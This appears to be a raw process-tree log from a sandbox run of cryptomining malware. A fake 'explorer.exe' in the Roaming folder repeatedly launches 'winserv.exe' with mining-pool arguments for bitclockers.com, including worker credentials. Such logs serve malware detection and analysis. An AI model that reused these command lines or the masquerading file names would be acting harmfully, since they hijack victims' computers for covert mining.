C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4388
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:764
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4764
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2220
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4164
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1388
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2304
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3628
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4204
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2940
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2824
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4660
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1020
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3668
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2996
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1732
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3676
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4820
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4836
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4048
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1572
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1856
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1236
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3940
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:692
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3852
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1916
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2156
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5104
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:376
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5088
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:440
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2668
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1384
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4424
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3620
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2748
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4452
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4008
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2236
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:872
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2884
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4168
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3712
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:812
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3940
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5028
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4912
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2348
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3536
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4460
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2644
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5008
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1412
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3440
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3524
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2364
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4776
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3888
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4020
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:100
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3932
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2176
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1568
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:628
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2672
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1804
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:748
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2360
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1800
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5032
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3748
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2944
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1392
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3668
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2596
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3984
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2024
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2204
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2020
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3376
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4004
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4228
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:912
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1572
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3772
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3628
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4904
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3416
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4764
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:760
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2508
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3748
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4208
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2484
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3660
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2260
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3128
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4124
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2888
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3156
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3708
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2500
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4860
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:100
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2520
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:116
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2176
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4688
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2916
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2652
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4164
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2248
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1968
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:540
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1616
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3184
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2264
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2944
-
